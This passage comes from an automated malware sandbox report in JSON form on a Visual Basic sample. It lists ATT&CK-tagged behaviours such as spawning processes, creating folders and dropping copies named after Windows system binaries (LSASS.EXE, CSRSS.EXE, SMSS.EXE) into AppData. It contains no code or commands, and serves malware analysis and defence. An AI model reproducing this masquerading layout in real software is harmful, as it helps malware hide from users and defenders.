\"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000132)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000356)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003488)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003624)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003624)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003624)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003596)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003596)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004480)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005948) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005948) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005948)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004240)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003452)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003996)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004372)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001176)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002444)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000272)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005880)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001960)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002304)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003728)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002344)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004336)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004348)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000916)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000952)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005948)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004240)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003452)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003996)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004372)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001176)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002444)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000272)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005880)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001960)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002304)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003728)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002344)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004336)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004348)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000916)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000952)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4BB1.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4BB1.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4667.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4667.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4665.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4665.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e726c@ADVAPI32.dll\"\n \"0e000f00703f726c@ADVAPI32.dll\"\n \"0e000f00cc3f726c@ADVAPI32.dll\"\n \"11001200b447726c@ADVAPI32.dll\"\n \"110012004848726c@ADVAPI32.dll\"\n \"120013008c48726c@ADVAPI32.dll\"\n \"12001300e448726c@ADVAPI32.dll\"\n \"14001500dc6f726c@ADVAPI32.dll\"\n \"14001500f46f726c@ADVAPI32.dll\"\n \"140015000c70726c@ADVAPI32.dll\"\n \"170018002470726c@ADVAPI32.dll\"\n \"0d000e003c70726c@ADVAPI32.dll\"\n \"110012004c70726c@ADVAPI32.dll\"\n \"110012006070726c@ADVAPI32.dll\"\n \"0f001000a071726c@ADVAPI32.dll\"\n \"14001500e071726c@ADVAPI32.dll\"\n \"14001500f871726c@ADVAPI32.dll\"\n \"0c000d004072726c@ADVAPI32.dll\"\n \"0c000d005072726c@ADVAPI32.dll\"\n \"0e000f006072726c@ADVAPI32.dll\"\n \"0e000f007072726c@ADVAPI32.dll\"\n \"0b000c008072726c@ADVAPI32.dll\"\n \"18001900b874726c@RPCRT4.dll\"\n \"13001400e474726c@RPCRT4.dll\"\n \"14001500f874726c@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00006008)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002452)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003996)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00001176)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00000272)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003964)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00000952)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006008)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00002452)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00002452)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00003996)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"IExplorer.exe\" has an executable section named \".text\"\n \"D3_08.exe.bin\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4BB1.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4667.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4665.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"WINLOGON.EXE\" has an executable section named \".text\"\n \"CSRSS.EXE\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"IExplorer.exe\" has an writable section named \".data\"\n \"D3_08.exe.bin\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4BB1.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4667.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4665.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"WINLOGON.EXE\" has an writable section named \".data\"\n \"CSRSS.EXE\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000952]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000952]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000952]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000952]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000952]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n 